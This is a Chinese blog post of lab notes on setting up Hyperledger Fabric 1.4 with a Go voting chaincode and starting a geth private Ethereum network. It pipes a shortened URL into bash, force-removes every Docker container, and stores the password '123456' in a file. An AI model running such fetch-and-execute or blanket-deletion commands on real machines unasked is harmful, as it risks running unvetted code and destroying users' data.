<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Block Chain | PaiBLOG</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="区块链实验过程简单记录">
<meta property="og:type" content="article">
<meta property="og:title" content="Block Chain">
<meta property="og:url" content="http://thethepai.github.io/2024/04/14/Block-Chain/index.html">
<meta property="og:site_name" content="PaiBLOG">
<meta property="og:description" content="区块链实验过程简单记录">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://thethepai.github.io/images/image-20231130112232554.png">
<meta property="og:image" content="http://thethepai.github.io/images/image-20231130112333766.png">
<meta property="og:image" content="http://thethepai.github.io/images/image-20231203085401363.png">
<meta property="og:image" content="http://thethepai.github.io/images/image-20231203085425591.png">
<meta property="og:image" content="http://thethepai.github.io/images/image-20231203085103161.png">
<meta property="article:published_time" content="2024-04-14T15:12:36.000Z">
<meta property="article:modified_time" content="2024-04-15T09:59:25.053Z">
<meta property="article:author" content="jackpai">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://thethepai.github.io/images/image-20231130112232554.png">
  
    <link rel="alternate" href="/atom.xml" title="PaiBLOG" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">PaiBLOG</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://thethepai.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-Block-Chain" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/04/14/Block-Chain/" class="article-date">
  <time class="dt-published" datetime="2024-04-14T15:12:36.000Z" itemprop="datePublished">2024-04-14</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      Block Chain
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p>区块链实验过程简单记录</p>
<span id="more"></span>

<h2 id="实验过程"><a href="#实验过程" class="headerlink" title="实验过程"></a>实验过程</h2><p>一共两个实验，主要使用ubuntu23.04进行</p>
<h3 id="fabric-1-4"><a href="#fabric-1-4" class="headerlink" title="fabric 1.4"></a>fabric 1.4</h3><h4 id="前置环境"><a href="#前置环境" class="headerlink" title="前置环境"></a>前置环境</h4><ul>
<li>Go，参考官网使用官方脚本安装：<a target="_blank" rel="noopener" href="https://go.dev/doc/install">https://go.dev/doc/install</a></li>
<li>Docker，根据官方脚本指引安装：<a target="_blank" rel="noopener" href="https://get.docker.com/">https://get.docker.com/</a></li>
</ul>
<p>注意go需要自己将bin添加到环境变量：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">source</span> /etc/profile</span><br><span class="line">sudo reboot</span><br></pre></td></tr></table></figure>

<h4 id="任务-1-Building-Your-First-Network"><a href="#任务-1-Building-Your-First-Network" class="headerlink" title="任务 1: Building Your First Network"></a>任务 1: Building Your First Network</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> fabric</span><br><span class="line"><span class="built_in">cd</span> fabric</span><br><span class="line">curl -sSL http://bit.ly/2ysbOFE | bash -s -- 1.4.12 1.4.9 0.4.22</span><br><span class="line"><span class="built_in">cd</span> fabric-samples/first-network</span><br></pre></td></tr></table></figure>

<p>如果连接不上<a target="_blank" rel="noopener" href="http://bit.ly/2ysbOFE%E4%B9%9F%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8%EF%BC%9A">http://bit.ly/2ysbOFE也可以使用：</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -sSL https://raw.githubusercontent.com/hyperledger/fabric/master/scripts/bootstrap.sh | bash -s -- 1.4.12 1.4.9 0.4.22</span><br></pre></td></tr></table></figure>

<p>结果我全都连不上，那么干脆直接把<a target="_blank" rel="noopener" href="http://bit.ly/2ysbOFE%E4%B8%8B%E8%BD%BD%E4%B8%8B%E6%9D%A5%EF%BC%8C%E7%84%B6%E5%90%8E%E6%89%8B%E5%8A%A8%E6%89%A7%E8%A1%8C%E8%84%9A%E6%9C%AC%EF%BC%9A">http://bit.ly/2ysbOFE下载下来，然后手动执行脚本：</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">chmod</span> +x bootstrap.sh</span><br><span class="line">sudo ./bootstrap.sh 1.4.12 1.4.9 0.4.22</span><br></pre></td></tr></table></figure>

<p>这样是等效的，注意要sudo不然安装的时候docker会报权限不够</p>
<p>到正确目录下以后启动试试看：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./byfn.sh generate</span><br><span class="line">./byfn.sh up</span><br></pre></td></tr></table></figure>

<p>注意，在执行的时候可能会报命令或文件找不到，这是因为新版docker中命令已经由<code>docker-compose</code>改成了<code>docker compose</code>，他报哪行不对就把那一行改过来然后重新执行，实测<code>./byfn.sh up</code>和一会儿用到的<code>./byfn.sh down</code>会分别报一次</p>
<p><img src="/images/image-20231130112232554.png" alt="image-20231130112232554"></p>
<p>结束：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./byfn.sh down</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20231130112333766.png" alt="image-20231130112333766"></p>
<h4 id="排故"><a href="#排故" class="headerlink" title="排故"></a>排故</h4><p>第二次generate时可能报错：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;Error response from daemon: Conflict. The container name <span class="string">&quot;/cli&quot;</span> is already <span class="keyword">in</span> use by container <span class="string">&quot;f56d257a543fb157cf482758fb7ecbebfb1e04187643222bb71564e9cabb541c&quot;</span>. You have to remove (or rename) that container to be able to reuse that name.</span><br></pre></td></tr></table></figure>

<p>把占用的容器直接remove掉：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker <span class="built_in">rm</span> f56d257a543fb157cf482758fb7ecbebfb1e04187643222bb71564e9cabb541c</span><br></pre></td></tr></table></figure>

<h4 id="任务-2-chaincode-编写"><a href="#任务-2-chaincode-编写" class="headerlink" title="任务 2: chaincode 编写"></a>任务 2: chaincode 编写</h4><p>在<code>fabric-samples/chaincode</code>目录下创建<code>vote</code>文件夹存储编写的代码，内容参考zjx佬</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// vote.go</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">        <span class="string">&quot;bytes&quot;</span></span><br><span class="line">        <span class="string">&quot;encoding/binary&quot;</span></span><br><span class="line">        <span class="string">&quot;fmt&quot;</span></span><br><span class="line">        <span class="string">&quot;strconv&quot;</span></span><br><span class="line"></span><br><span class="line">        <span class="string">&quot;github.com/hyperledger/fabric/core/chaincode/shim&quot;</span></span><br><span class="line">        <span class="string">&quot;github.com/hyperledger/fabric/protos/peer&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="comment">// VoteChaincode 结构体定义</span></span><br><span class="line"><span class="keyword">type</span> VoteChaincode <span class="keyword">struct</span> &#123;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Init 是链码的初始化函数</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(t *VoteChaincode)</span></span> Init(stub shim.ChaincodeStubInterface) peer.Response &#123;</span><br><span class="line">        <span class="keyword">return</span> shim.Success(<span class="literal">nil</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Invoke 是链码的调用函数</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(t *VoteChaincode)</span></span> Invoke(stub shim.ChaincodeStubInterface) peer.Response &#123;</span><br><span class="line">        fn, args := stub.GetFunctionAndParameters()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> fn == <span class="string">&quot;vote&quot;</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> vote(stub, args)</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> get(stub, args)</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// vote 是投票函数</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">vote</span><span class="params">(stub shim.ChaincodeStubInterface, args []<span class="type">string</span>)</span></span> peer.Response &#123;</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(args) != <span class="number">1</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> shim.Error(<span class="string">&quot;Incorrect arguments. Expecting a name&quot;</span>)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        name := args[<span class="number">0</span>]</span><br><span class="line">        voteAsBytes, err := stub.GetState(name)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> shim.Error(err.Error())</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        voteCount := <span class="number">0</span></span><br><span class="line">        <span class="keyword">if</span> voteAsBytes != <span class="literal">nil</span> &#123;</span><br><span class="line">                voteCount = BytesToInt(voteAsBytes)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        err = stub.PutState(name, IntToBytes(voteCount+<span class="number">1</span>))</span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> shim.Error(err.Error())</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> shim.Success(<span class="literal">nil</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// get 是查询函数</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">get</span><span class="params">(stub shim.ChaincodeStubInterface, args []<span class="type">string</span>)</span></span> peer.Response &#123;</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(args) == <span class="number">0</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> getAll(stub)</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> <span class="built_in">len</span>(args) == <span class="number">1</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> getOne(stub, args[<span class="number">0</span>])</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> shim.Error(<span class="string">&quot;Incorrect arguments.&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// getAll 获取所有投票结果</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">getAll</span><span class="params">(stub shim.ChaincodeStubInterface)</span></span> peer.Response &#123;</span><br><span class="line">        resultIterator, err := stub.GetStateByRange(<span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>)</span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> shim.Error(err.Error())</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">defer</span> resultIterator.Close()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">var</span> buffer bytes.Buffer</span><br><span class="line">        buffer.WriteString(<span class="string">&quot;[&quot;</span>)</span><br><span class="line"></span><br><span class="line">        isWritten := <span class="literal">false</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> resultIterator.HasNext() &#123;</span><br><span class="line">                queryResult, err := resultIterator.Next()</span><br><span class="line">                <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">                        <span class="keyword">return</span> shim.Error(err.Error())</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                <span class="keyword">if</span> isWritten == <span class="literal">true</span> &#123;</span><br><span class="line">                        buffer.WriteString(<span class="string">&quot;, &quot;</span>)</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                buffer.WriteString(queryResult.Key)</span><br><span class="line">                buffer.WriteString(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">                buffer.WriteString(strconv.Itoa(BytesToInt(queryResult.Value)))</span><br><span class="line">                isWritten = <span class="literal">true</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        buffer.WriteString(<span class="string">&quot;]&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> shim.Success(buffer.Bytes())</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// getOne 获取特定名称的投票结果</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">getOne</span><span class="params">(stub shim.ChaincodeStubInterface, name <span class="type">string</span>)</span></span> peer.Response &#123;</span><br><span class="line">        voteAsBytes, err := stub.GetState(name)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> shim.Error(err.Error())</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        count := <span class="number">0</span></span><br><span class="line">        <span class="keyword">if</span> voteAsBytes != <span class="literal">nil</span> &#123;</span><br><span class="line">                count = BytesToInt(voteAsBytes)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">var</span> buffer bytes.Buffer</span><br><span class="line">        buffer.WriteString(<span class="string">&quot;[&quot;</span>)</span><br><span class="line"></span><br><span class="line">        buffer.WriteString(name)</span><br><span class="line">        buffer.WriteString(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">        buffer.WriteString(strconv.Itoa(count))</span><br><span class="line"></span><br><span class="line">        buffer.WriteString(<span class="string">&quot;]&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> shim.Success(buffer.Bytes())</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// main 函数是链码的入口点</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">        <span class="keyword">if</span> err := shim.Start(<span class="built_in">new</span>(VoteChaincode)); err != <span class="literal">nil</span> &#123;</span><br><span class="line">                fmt.Printf(<span class="string">&quot;Error starting vote chaincode: %s&quot;</span>, err)</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// IntToBytes 将整数转换为字节数组</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">IntToBytes</span><span class="params">(n <span class="type">int</span>)</span></span> []<span class="type">byte</span> &#123;</span><br><span class="line">        x := <span class="type">int32</span>(n)</span><br><span class="line">        bytesBuffer := bytes.NewBuffer([]<span class="type">byte</span>&#123;&#125;)</span><br><span class="line">        binary.Write(bytesBuffer, binary.BigEndian, x)</span><br><span class="line">        <span class="keyword">return</span> bytesBuffer.Bytes()</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// BytesToInt 将字节数组转换为整数</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">BytesToInt</span><span class="params">(b []<span class="type">byte</span>)</span></span> <span class="type">int</span> &#123;</span><br><span class="line">        bytesBuffer := bytes.NewBuffer(b)</span><br><span class="line">        <span class="keyword">var</span> x <span class="type">int32</span></span><br><span class="line">        binary.Read(bytesBuffer, binary.BigEndian, &amp;x)</span><br><span class="line">        <span class="keyword">return</span> <span class="type">int</span>(x)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>按照以下步骤执行启动：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1号终端：启动网络</span></span><br><span class="line"><span class="built_in">cd</span> ../../chaincode-docker-devmode</span><br><span class="line">docker compose -f docker-compose-simple.yaml up</span><br><span class="line"><span class="comment"># 2号终端：启动chaincode</span></span><br><span class="line">docker <span class="built_in">exec</span> -it chaincode bash</span><br><span class="line"><span class="built_in">cd</span> vote/</span><br><span class="line">go build</span><br><span class="line">CORE_PEER_ADDRESS=peer:7052 CORE_CHAINCODE_ID_NAME=mycc:0 ./vote</span><br><span class="line"><span class="comment"># 3号终端：使用chaincode</span></span><br><span class="line">docker <span class="built_in">exec</span> -it cli bash</span><br><span class="line">peer chaincode install -p chaincodedev/chaincode/vote -n mycc -v 0</span><br><span class="line"><span class="comment"># 初始化</span></span><br><span class="line">peer chaincode instantiate -n mycc -v 0 -c <span class="string">&#x27;&#123;&quot;Args&quot;:[]&#125;&#x27;</span> -C myc</span><br><span class="line"><span class="comment"># 投票</span></span><br><span class="line">peer chaincode invoke -n mycc -c <span class="string">&#x27;&#123;&quot;Args&quot;:[&quot;vote&quot;, &quot;Mike&quot;]&#125;&#x27;</span> -C myc</span><br></pre></td></tr></table></figure>

<p>实验测试，查询投票结果：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 查询所有</span></span><br><span class="line">peer chaincode invoke -n mycc -c <span class="string">&#x27;&#123;&quot;Args&quot;:[&quot;get&quot;]&#125;&#x27;</span> -C myc</span><br><span class="line"><span class="comment"># 查询单个</span></span><br><span class="line">peer chaincode invoke -n mycc -c <span class="string">&#x27;&#123;&quot;Args&quot;:[&quot;get&quot;, &quot;Mike&quot;]&#125;&#x27;</span> -C myc</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20231203085401363.png" alt="image-20231203085401363"></p>
<p><img src="/images/image-20231203085425591.png" alt="image-20231203085425591"></p>
<h4 id="排故-1"><a href="#排故-1" class="headerlink" title="排故"></a>排故</h4><p>这里出现一个问题，当运行<code>docker exec</code>时可能会进不去，提示形如下文：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 我的cli这一个container进不去</span></span><br><span class="line">container xxxx is not running</span><br></pre></td></tr></table></figure>

<p>自己手动启动<code>docker start</code>也没有用，查看<code>docker logs cli</code>发现最后有这样的报错：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Error: got unexpected status: BAD_REQUEST -- error applying config update to existing channel <span class="string">&#x27;myc&#x27;</span>: error authorizing update: error validating ReadSet: proposed update requires that key [Group]  /Channel/Application be at version 0, but it is currently at version 1</span><br></pre></td></tr></table></figure>

<p>笑吸了，原来是上次的镜像没有关，导致已经有一个channel，阻止了下一步的进行，具体表现为更新通道配置时产生了矛盾，全都关掉重来：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker <span class="built_in">rm</span> -f $(docker ps -aq)</span><br></pre></td></tr></table></figure>

<p>然后就能顺利进去了，nice</p>
<h3 id="ethereum"><a href="#ethereum" class="headerlink" title="ethereum"></a>ethereum</h3><p>参考<a target="_blank" rel="noopener" href="https://geth.ethereum.org/docs/">https://geth.ethereum.org/docs/</a></p>
<h4 id="前置环境-1"><a href="#前置环境-1" class="headerlink" title="前置环境"></a>前置环境</h4><p>安装以太坊工具：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo add-apt-repository -y ppa:ethereum/ethereum</span><br><span class="line">sudo apt-get update &amp;&amp; sudo apt-get install ethereum</span><br></pre></td></tr></table></figure>

<h4 id="任务-1：搭建一个以太坊的多节点私有网络"><a href="#任务-1：搭建一个以太坊的多节点私有网络" class="headerlink" title="任务 1：搭建一个以太坊的多节点私有网络"></a>任务 1：搭建一个以太坊的多节点私有网络</h4><p>按照以下步骤进行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> node1 node2</span><br><span class="line"><span class="comment"># 密码都用123456，注意记下Address</span></span><br><span class="line">geth --datadir node1 account new <span class="comment"># 0x41090BEc560C3a9fc33d929c45F6D051AA064415</span></span><br><span class="line">geth --datadir node2 account new <span class="comment"># 0x4126B653636e5a47aBd28408FB285B6Bf69fEFb7</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;123456&quot;</span> &gt;&gt; password.txt</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 创建 genesis.json，alloc里的两个要改成我们新建的那两个node，extradata中间的那一块改成node1</span></span><br><span class="line"><span class="comment"># ----------------------</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="string">&quot;config&quot;</span>: &#123;</span><br><span class="line">    <span class="string">&quot;chainId&quot;</span>: 12345,</span><br><span class="line">    <span class="string">&quot;homesteadBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;eip150Block&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;eip155Block&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;eip158Block&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;byzantiumBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;constantinopleBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;petersburgBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;istanbulBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;muirGlacierBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;berlinBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;londonBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;arrowGlacierBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;grayGlacierBlock&quot;</span>: 0,</span><br><span class="line">    <span class="string">&quot;clique&quot;</span>: &#123;</span><br><span class="line">      <span class="string">&quot;period&quot;</span>: 5,</span><br><span class="line">      <span class="string">&quot;epoch&quot;</span>: 30000</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;,</span><br><span class="line">  <span class="string">&quot;difficulty&quot;</span>: <span class="string">&quot;1&quot;</span>,</span><br><span class="line">  <span class="string">&quot;gasLimit&quot;</span>: <span class="string">&quot;800000000&quot;</span>,</span><br><span class="line">  <span class="string">&quot;extradata&quot;</span>: <span class="string">&quot;0x000000000000000000000000000000000000000000000000000000000000000041090BEc560C3a9fc33d929c45F6D051AA0644150000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000&quot;</span>,</span><br><span class="line">  <span class="string">&quot;alloc&quot;</span>: &#123;</span><br><span class="line">    <span class="string">&quot;41090BEc560C3a9fc33d929c45F6D051AA064415&quot;</span>: &#123; <span class="string">&quot;balance&quot;</span>: <span class="string">&quot;100000000000000000000&quot;</span> &#125;,</span><br><span class="line">    <span class="string">&quot;4126B653636e5a47aBd28408FB285B6Bf69fEFb7&quot;</span>: &#123; <span class="string">&quot;balance&quot;</span>: <span class="string">&quot;100000000000000000000&quot;</span> &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment"># ---------------------</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 初始化</span></span><br><span class="line">geth init --datadir node1 genesis.json</span><br><span class="line">geth init --datadir node2 genesis.json</span><br><span class="line">bootnode -genkey boot.key</span><br><span class="line">bootnode -nodekey boot.key -addr :30305</span><br></pre></td></tr></table></figure>

